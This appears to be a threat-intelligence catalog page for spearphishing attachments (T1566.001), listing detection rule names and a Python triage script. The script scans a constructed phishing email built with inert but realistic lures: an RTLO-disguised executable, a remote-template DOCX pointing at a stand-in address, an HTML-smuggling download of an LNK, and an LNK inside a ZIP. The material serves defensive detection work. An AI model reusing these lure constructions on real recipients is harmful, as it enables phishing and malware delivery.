T1566.001

Spearphishing Attachment

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing; it differs from the other forms in that it relies on malware attached to the email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the sp...

Platforms: Linux, macOS, Windows
Detections: 850
Sources: 4
Threat Actors: 77

BY SOURCE

sublime: 780; splunk_escu: 31; elastic: 21; sigma: 18

PROCEDURES (143)

Auto-extracted keyword buckets (keyword or stem, followed by its detection count), listed as extracted; the same keyword can appear more than once.

Authentication Monitoring: 95 detections
Impersonat: 43 detections
Credential: 39 detections
Email Security: 39 detections
General Monitoring: 38 detections
Impersonat: 33 detections
Credential: 32 detections
Attachment: 31 detections
Email: 27 detections
Service: 25 detections
Service: 20 detections
Phish: 19 detections
Email: 18 detections
Network Connection Monitoring: 17 detections
Script Execution Monitoring: 16 detections
Phish: 15 detections
Attachment: 15 detections
Credential: 13 detections
Attachment: 13 detections
Base64: 11 detections
Phish: 9 detections
Impersonat: 9 detections
Macro: 8 detections
Download: 8 detections
Bypass: 8 detections
Bypass: 7 detections
Download: 7 detections
Credential: 7 detections
Suspicious: 7 detections
Suspicious: 6 detections
Obfuscat: 6 detections
Office: 6 detections
Encrypt: 6 detections
Unusual: 6 detections
Base64: 6 detections
Cloud: 5 detections
Credential: 5 detections
Cloud: 4 detections
Process Creation Monitoring: 4 detections
Suspicious: 4 detections
Suspicious: 4 detections
Impersonat: 3 detections
Http: 3 detections
Suspicious: 3 detections
Service: 3 detections
Encrypt: 3 detections
Encrypt: 3 detections
Attachment: 3 detections
Child Process: 3 detections
Child Process: 3 detections
Download: 3 detections
Office: 3 detections
Api: 3 detections
Service: 3 detections
Email: 3 detections
Obfuscat: 3 detections
Download: 3 detections
Service: 3 detections
Phish: 2 detections
Phish: 2 detections
Remote: 2 detections
Macro: 2 detections
Obfuscat: 2 detections
Obfuscat: 2 detections
Email: 2 detections
Unusual: 2 detections
Office: 2 detections
Office: 2 detections
Suspicious: 2 detections
Powershell: 2 detections
Bypass: 2 detections
Exfiltrat: 2 detections
Exfiltrat: 2 detections
Macro: 2 detections
Evasion: 2 detections
Evasion: 2 detections
Macro: 2 detections
Child Process: 2 detections
Dns: 2 detections
Command Line Monitoring: 2 detections
Lateral: 2 detections
Masquerad: 1 detection
Inject: 1 detection
Attachment: 1 detection
Powershell: 1 detection
Aws: 1 detection
Http: 1 detection
File Monitoring: 1 detection
Inject: 1 detection
Unusual: 1 detection
Lateral: 1 detection
Remote: 1 detection
Api: 1 detection
Service: 1 detection
Unusual: 1 detection
Token: 1 detection
Token: 1 detection
Http: 1 detection
Evasion: 1 detection
Parent Process: 1 detection
Email: 1 detection
Base64: 1 detection
Parent Process: 1 detection
Persist: 1 detection
Bypass: 1 detection
Macro: 1 detection
Privilege: 1 detection
Masquerad: 1 detection
Registry: 1 detection
Powershell: 1 detection
Unusual: 1 detection
Aws: 1 detection
Cloud: 1 detection
Inject: 1 detection
Unusual: 1 detection
Oauth: 1 detection
Oauth: 1 detection
Inject: 1 detection
Bypass: 1 detection
Phish: 1 detection
Parent Process: 1 detection
Parent Process: 1 detection
Api: 1 detection
Remote: 1 detection
Oauth: 1 detection
Child Process: 1 detection
Registry: 1 detection
Module Load Monitoring: 1 detection
Bypass: 1 detection
Remote: 1 detection
Privilege: 1 detection
Exfiltrat: 1 detection
Impersonat: 1 detection
Impersonat: 1 detection
Aws: 1 detection
Attachment: 1 detection
Evasion: 1 detection
Credential: 1 detection
Impersonat: 1 detection
Cloud: 1 detection
Credential: 1 detection
Persist: 1 detection
Exfiltrat: 1 detection
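
As an added illustration of what several of the attachment-level detections catalogued on this page actually check (this is example code written for this page, not a rule from Sublime, Sigma, Elastic or Splunk), the Python below parses a constructed EML and scores each attachment for a handful of the listed signals: a right-to-left override character in the filename, an executable extension, HTML smuggling markers (atob, Blob, forced download) next to a long high-entropy literal, an Office document whose settings relationship loads a remote template over HTTP, an OLE/OOXML external relationship using the file: scheme, an encrypted archive member, and an archive carrying an LNK. The sample message, the extension list, the marker list, the entropy threshold and the address 203.0.113.7 (a documentation range) are all constructed or assumed for the example.

```python
"""Attachment triage over a constructed spearphishing EML. Added example for this page,
not code from Sublime, Sigma, Elastic or Splunk; extension set, markers and thresholds are assumptions."""
import base64, hashlib, io, math, re, zipfile
from collections import Counter
from email import message_from_bytes, policy
from email.message import EmailMessage

EXEC_EXT = {".exe", ".scr", ".lnk", ".js", ".wsf", ".vbs", ".hta", ".cmd", ".bat", ".msi", ".iso", ".img", ".vhdx"}
HIDDEN_CHARS = {"\u202e": "right-to-left override", "\u2800": "braille pattern blank"}
SMUGGLING_MARKERS = (r"\batob\s*\(", r"\beval\s*\(", r"fromCharCode",
                     r"\bunescape\s*\(", r"new\s+Blob\s*\(", r"\.download\s*=")
REL_TAG = re.compile(r"<Relationship\b[^>]*>")
TEMPLATE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

def shannon_entropy(s: str) -> float:
    """Bits per symbol: base64 of random bytes is near 6.0, English text near 4.5."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def _attr(tag: str, name: str) -> str:
    m = re.search(rf'\b{name}="([^"]*)"', tag)
    return m.group(1) if m else ""

def html_signals(text: str) -> list:
    """HTML smuggling: two or more decode/download markers plus a long high-entropy literal."""
    out = []
    hits = [p for p in SMUGGLING_MARKERS if re.search(p, text)]
    if len(hits) >= 2:
        out.append(f"HTML smuggling markers ({len(hits)})")
    ent = max((shannon_entropy(lit) for lit in re.findall(r"""["']([^"']{200,})["']""", text)), default=0.0)
    if ent > 5.0:  # assumed threshold
        out.append(f"high-entropy string literal ({ent:.2f} bits/char)")
    return out

def archive_signals(payload: bytes) -> list:
    """Look inside ZIP containers; OOXML Office files are ZIPs too."""
    out = []
    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
        for info in zf.infolist():
            low = info.filename.lower()
            if info.flag_bits & 0x1:  # general-purpose bit 0: member is encrypted
                out.append(f"encrypted member: {info.filename}")
            if any(low.endswith(e) for e in EXEC_EXT):
                out.append(f"archive contains executable type: {info.filename}")
            if low.endswith(".rels"):  # OOXML relationship part: look for external targets
                for tag in REL_TAG.findall(zf.read(info).decode("utf-8", "replace")):
                    if _attr(tag, "TargetMode") == "External":
                        target = _attr(tag, "Target")
                        kind = "remote template" if _attr(tag, "Type") == TEMPLATE_REL else "external relationship"
                        scheme = " via file: scheme" if target.lower().startswith("file:") else ""
                        out.append(f"{kind}{scheme} -> {target}")
    return out

def inspect_attachment(filename: str, payload: bytes) -> list:
    sigs = [f"filename contains Unicode {lbl}" for ch, lbl in HIDDEN_CHARS.items() if ch in filename]
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in EXEC_EXT:
        sigs.append(f"executable extension {ext}")
    if ext in {".html", ".htm", ".shtml", ".svg"}:
        sigs += html_signals(payload.decode("utf-8", "replace"))
    if payload.startswith(b"PK\x03\x04"):
        sigs += archive_signals(payload)
    return sigs

def score_message(raw: bytes) -> dict:
    """Map each attachment filename to the list of signals it triggered."""
    msg = message_from_bytes(raw, policy=policy.default)
    return {p.get_filename(): inspect_attachment(p.get_filename(), p.get_payload(decode=True))
            for p in msg.iter_attachments()}

def _zip(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def build_sample_eml() -> bytes:
    """Constructed lure with four attachments; 203.0.113.7 is a documentation address."""
    blob = base64.b64encode(b"".join(hashlib.sha256(bytes([i])).digest() for i in range(32))).decode()
    html = ('<html><body onload="run()"><script>var p="' + blob + '";function run(){'
            'var b=new Blob([atob(p)]);var a=document.createElement("a");a.href=URL.createObjectURL(b);'
            'a.download="Remittance.pdf.lnk";a.click();}</script></body></html>')
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId1" Type="{TEMPLATE_REL}" Target="http://203.0.113.7/t.dotm" '
            'TargetMode="External"/></Relationships>')
    docx = _zip({"[Content_Types].xml": "<Types/>", "word/document.xml": "<w:document/>",
                 "word/_rels/settings.xml.rels": rels})
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "ap@example.net", "cfo@example.com", "Overdue invoice"
    msg.set_content("Please review the attached documents today.")
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 60, maintype="application", subtype="octet-stream",
                       filename="Statement\u202efdp.exe")  # RTLO: renders as Statementexe.pdf
    msg.add_attachment(docx, maintype="application", subtype="octet-stream", filename="Invoice.docx")
    msg.add_attachment(html.encode(), maintype="text", subtype="html", filename="Remittance.html")
    msg.add_attachment(_zip({"scan.pdf.lnk": b"L\x00\x00\x00", "readme.txt": b"open scan"}),
                       maintype="application", subtype="zip", filename="Scan.zip")
    return msg.as_bytes()

if __name__ == "__main__":
    for name, sigs in score_message(build_sample_eml()).items():
        print(repr(name), "->", sigs or ["no signals"])
```

Run it directly to print the signals per attachment. Each check is a coarse stand-in for the corresponding entries in the list below (for example "Filename containing Unicode right-to-left override character", "HTML smuggling with atob and high entropy", "Office document loads remote document template", "OLE external relationship containing file scheme link to executable filetype", "Attachment with encrypted zip (unsolicited)" and "Archive with embedded EXE file"); production rules also weigh sender reputation and whether the message was solicited, which this sample does not model. The relationship parser is regex-based and assumes well-formed OOXML; a real implementation should use an XML parser and also walk document.xml.rels and the OLE object relationships.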

DETECTIONS (850)

Detection | Source | Severity
Abuse: Cloudflare Workers Hosted EvilTokens Domain Structure | sublime | high
Adobe branded PDF file linking to a password-protected file from untrusted sender | sublime | high
AnonymousFox indicators | sublime | high
Anthropic Magic String in HTML | sublime | low
Arbitrary Shell Command Execution Via Settingcontent-Ms | sigma | medium
Attachment soliciting user to enable macros | sublime | high
Attachment with auto-executing macro (unsolicited) | sublime | medium
Attachment with auto-opening VBA macro (unsolicited) | sublime | medium
Attachment with encrypted zip (unsolicited) | sublime | medium
Attachment with high risk VBA macro (unsolicited) | sublime | high
Attachment with macro calling executable | sublime | high
Attachment with suspicious author (unsolicited) | sublime | high
Attachment with unscannable encrypted zip (unsolicited) | sublime | medium
Attachment with VBA macros from employee impersonation (unsolicited) | sublime | high
Attachment: .csproj with suspicious commands | sublime | high
Attachment: 7z Archive Containing RAR File | sublime | medium
Attachment: Adobe image lure in body or attachment with suspicious link | sublime | medium
Attachment: Any .sap file (unsolicited) | sublime | low
Attachment: Any HTML file within archive (unsolicited) | sublime | medium
Attachment: Archive containing disallowed file type | sublime | low
Attachment: Archive containing HTML file with file scheme link | sublime | high
Attachment: Archive contains DLL-loading macro | sublime | high
Attachment: Archive with embedded CHM file | sublime | medium
Attachment: Archive with embedded EXE file | sublime | high
Attachment: Archive with pdf, txt and wsf files | sublime | medium
Attachment: Base64 encoded bash command in filename | sublime | high
Attachment: Calendar file with invisible Unicode characters | sublime | high
Attachment: Calendar invite with Google redirect and invoice request | sublime | medium
Attachment: cmd file extension | sublime | low
Attachment: Compensation review lure with QR code | sublime | high
Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability | sublime | critical
Attachment: CVE-2023-21716 - Microsoft Office Remote Code Execution Vulnerability | sublime | high
Attachment: CVE-2025-24071 - Microsoft Windows File Explorer Spoofing Vulnerability | sublime | critical
Attachment: Decoy PDF author (Julie P.) | sublime | high
Attachment: DocuSign impersonation via PDF linking to new domain | sublime | medium
Attachment: DocX embedded binary | sublime | high
Attachment: DOCX with hyperlink targeting recipient address | sublime | medium
Attachment: Double base64-encoded zip file in HTML smuggling attachment | sublime | high
Attachment: Dropbox image lure with no Dropbox domains in links | sublime | medium
Attachment: EICAR string present | sublime | low
Attachment: Embedded Javascript in SVG file | sublime | high
Attachment: Embedded VBScript in MHT file (unsolicited) | sublime | medium
Attachment: EML containing a base64 encoded script | sublime | high
Attachment: EML file contains HTML attachment with login portal indicators | sublime | high
Attachment: EML file with HTML attachment (unsolicited) | sublime | medium
Attachment: EML file with IPFS links | sublime | medium
Attachment: EML with embedded Javascript in SVG file | sublime | high
Attachment: EML with Encrypted ZIP | sublime | low
Attachment: EML with link to credential phishing page | sublime | high
Attachment: EML with QR code redirecting to Cloudflare challenges | sublime | low
Attachment: EML with SharePoint files shared from GoDaddy federated tenants | sublime | low
Attachment: EML with Sharepoint link likely unrelated to sender | sublime | medium
Attachment: EML with suspicious indicators | sublime | medium
Attachment: Emotet heavily padded doc in zip file | sublime | high
Attachment: Employment contract update with suspicious file naming | sublime | high
Attachment: Encrypted Microsoft Office file (unsolicited) | sublime | medium
Attachment: Encrypted PDF with credential theft body | sublime | medium
Attachment: Encrypted ZIP containing VHDX file | sublime | medium
Attachment: Encrypted zip file with payment-related lure | sublime | medium
Attachment: Excel file with document sharing lure created by Go Excelize | sublime | high
Attachment: Excel file with suspicious template identifier | sublime | high
Attachment: Excel Web Query File (IQY) | sublime | high
Attachment: Fake attachment image lure | sublime | medium
Attachment: Fake scan-to-email | sublime | medium
Attachment: Fake secure message and suspicious indicators | sublime | medium
Attachment: Fake Slack installer | sublime | high
Attachment: Fake voicemail via PDF | sublime | medium
Attachment: Fake Zoom installer | sublime | high
Attachment: File execution via Javascript | sublime | medium
Attachment: Filename containing Unicode braille pattern blank character | sublime | high
Attachment: Filename containing Unicode right-to-left override character | sublime | high
Attachment: Finance themed PDF with observed phishing template | sublime | medium
Attachment: HTML attachment with Javascript location | sublime | high
Attachment: HTML attachment with login portal indicators | sublime | medium
Attachment: HTML file contains exclusively Javascript | sublime | medium
Attachment: HTML file with excessive 'const' declarations and abnormally long timeouts | sublime | high
Attachment: HTML file with excessive padding and suspicious patterns | sublime | high
Attachment: HTML file with reference to recipient and suspicious patterns | sublime | high
Attachment: HTML smuggling - QR Code with suspicious links | sublime | high
Attachment: HTML smuggling 'body onload' linking to suspicious destination | sublime | high
Attachment: HTML smuggling 'body onload' with high entropy and suspicious text | sublime | high
Attachment: HTML smuggling Microsoft sign in | sublime | high
Attachment: HTML smuggling with atob and high entropy | sublime | high
Attachment: HTML smuggling with atob and high entropy via calendar invite | sublime | high
Attachment: HTML smuggling with auto-downloaded file | sublime | high
Attachment: HTML smuggling with base64 encoded JavaScript function | sublime | high
Attachment: HTML smuggling with base64 encoded ZIP file | sublime | medium
Attachment: HTML smuggling with concatenation obfuscation | sublime | high
Attachment: HTML smuggling with decimal encoding | sublime | high
Attachment: HTML smuggling with embedded base64 streamed file download | sublime | high
Attachment: HTML smuggling with embedded base64-encoded executable | sublime | high
Attachment: HTML smuggling with embedded base64-encoded ISO | sublime | high
Attachment: HTML smuggling with eval and atob | sublime | high
Attachment: HTML smuggling with eval and atob via calendar invite | sublime | high
Attachment: HTML smuggling with excessive line break obfuscation | sublime | high
Attachment: HTML smuggling with excessive string concatenation and suspicious patterns | sublime | medium
Attachment: HTML smuggling with fromCharCode and other signals | sublime | high
Attachment: HTML smuggling with hex strings | sublime | medium
Attachment: HTML smuggling with high entropy and other signals | sublime | high
Attachment: HTML smuggling with raw array buffer | sublime | high
Attachment: HTML smuggling with RC4 decryption | sublime | high
Attachment: HTML smuggling with ROT13 | sublime | high
Attachment: HTML smuggling with setTimeout | sublime | high
Attachment: HTML smuggling with unescape | sublime | high
Attachment: HTML with emoji-to-character map | sublime | high
Attachment: HTML with hidden body | sublime | high
Attachment: HTML with JavaScript functions for HTTP requests | sublime | high
Attachment: HTML with obfuscation and recipient's email in JavaScript strings | sublime | high
Attachment: ICS calendar with embedded file from internal sender with SPF failure | sublime | high
Attachment: ICS file with AWS Lambda URL | sublime | medium
Attachment: ICS file with excessive custom properties | sublime | medium
Attachment: ICS file with meeting prefix | sublime | high
Attachment: ICS file with non-Gregorian calendar scale | sublime | medium
Attachment: ICS with embedded document | sublime | low
Attachment: ICS with embedded Javascript in SVG file | sublime | high
Attachment: ICS with employee policy review lure | sublime | high
Attachment: JavaScript file with suspicious base64-encoded executable | sublime | high
Attachment: Legal themed message or PDF with suspicious indicators | sublime | medium
Attachment: Link file with UNC path | sublime | medium
Attachment: Link to Doubleclick.net open redirect | sublime | medium
Attachment: LNK file | sublime | high
Attachment: LNK with embedded content | sublime | high
Attachment: Macro files containing MHT content | sublime | medium
Attachment: Macro with suspected use of COM ShellBrowserWindow object for process creation | sublime | high
Attachment: Malformed OLE file | sublime | high
Attachment: Malicious OneNote commands | sublime | high
Attachment: Microsoft 365 credential phishing | sublime | high
Attachment: Microsoft impersonation via PDF with link and suspicious language | sublime | high
Attachment: MS Office or RTF file with Shell.Explorer.1 com object with embedded LNK | sublime | medium
Attachment: MSI installer file | sublime | medium
Attachment: Office document loads remote document template | sublime | medium
Attachment: Office document with VSTO add-in | sublime | high
Attachment: Office file contains OLE relationship to credential phishing page | sublime | high
Attachment: Office file with credential phishing URLs | sublime | medium
Attachment: Office file with document sharing and browser instruction lures | sublime | high
Attachment: Office file with suspicious function calls or downloaded file path | sublime | high
Attachment: OLE external relationship containing file scheme link to executable filetype | sublime | high
Attachment: OLE external relationship containing file scheme link to IP address | sublime | high
Attachment: Password-protected PDF with fake document indicators | sublime | medium
Attachment: PDF bid/proposal lure with credential theft indicators | sublime | medium
Attachment: PDF contains W9 or invoice YARA signatures | sublime | medium
Attachment: PDF file with embedded content | sublime | high
Attachment: PDF file with low reputation link to ZIP file (unsolicited) | sublime | medium
Attachment: PDF file with low reputation links to suspicious filetypes (unsolicited) | sublime | medium
Attachment: PDF generated with wkhtmltopdf tool and default title | sublime | low
Attachment: PDF Object Hash - Encrypted PDFs with fake payment notification | sublime | medium
Attachment: PDF proposal with credential theft indicators | sublime | high
Attachment: PDF with a suspicious string and single URL | sublime | high
Attachment: PDF with credential theft language and invalid reply-to domain | sublime | medium
Attachment: PDF with credential theft language and link to a free subdomain (unsolicited) | sublime | medium
Attachment: PDF with embedded Javascript | sublime | medium
Attachment: PDF with link to DMG file download | sublime | medium
Attachment: PDF with link to zip containing a wsf file | sublime | high
Attachment: PDF with Microsoft Purview message impersonation | sublime | medium
Attachment: PDF with multistage landing - ClickUp abuse | sublime | high
Attachment: PDF with password in filename matching body text | sublime | medium
Attachment: PDF with personal Microsoft OneNote URL | sublime | medium
Attachment: PDF with recipient email in link | sublime | high
Attachment: PDF with ReportLab library and default metadata | sublime | low
Attachment: PDF with suspicious HeadlessChrome metadata | sublime | medium
Attachment: PDF with suspicious language and redirect to suspicious file type | sublime | high
Attachment: PDF with suspicious link and action-oriented language | sublime | high
Attachment: Potential sandbox evasion in Office file | sublime | high
Attachment: PowerPoint with suspicious hyperlink | sublime | high
Attachment: PowerShell content | sublime | high
Attachment: QR code link with base64-encoded recipient address | sublime | high
Attachment: QR code with credential phishing indicators | sublime | medium
Attachment: QR code with encoded recipient targeting and redirect indicators | sublime | high
Attachment: QR code with recipient targeting and special characters | sublime | high
Attachment: QR code with suspicious URL patterns in EML file | sublime | high
Attachment: QR code with userinfo portion | sublime | high
Attachment: RDP connection file | sublime | medium
Attachment: RFC822 containing suspicious file sharing language with links from untrusted sender | sublime | medium
Attachment: RTF file with suspicious link | sublime | medium
Attachment: RTF with embedded content | sublime | medium
Attachment: Self-sender PDF with minimal content and view prompt | sublime | high
Attachment: SFX archive containing commands | sublime | medium
Attachment: Small text file with link containing recipient email address | sublime | medium
Attachment: Soda PDF producer with encryption themes | sublime | high
Attachment: Suspicious employee policy update document lure | sublime | medium
Attachment: Suspicious PDF created with headless browser | sublime | high
Attachment: SVG file execution | sublime | high
Attachment: SVG files with evasion elements | sublime | high
Attachment: Uncommon compressed file | sublime | low
Attachment: Web files with suspicious comments | sublime | high
Attachment: WinRAR CVE-2025-8088 exploitation | sublime | high
Attachment: XLSX file with suspicious print titles metadata | sublime | high
Attachment: ZIP file with CVE-2026-0866 exploit | sublime | medium
Benefits enrollment impersonation | sublime | high
Body HTML: Recipient SLD in HTML class | sublime | medium
Body: Embedded email headers indicative of thread hijacking/abuse | sublime | medium
Brand impersonation: AARP | sublime | medium
Brand impersonation: Adobe (QR code) | sublime | high
Brand impersonation: Adobe Sign with suspicious indicators | sublime | high
Brand impersonation: Adobe with suspicious language and link | sublime | high
Brand impersonation: ADP | sublime | medium
Brand impersonation: AliExpress | sublime | medium
Brand impersonation: Amazon | sublime | low
Brand impersonation: Amazon Web Services (AWS) | sublime | medium
Brand impersonation: Amazon with suspicious attachment | sublime | medium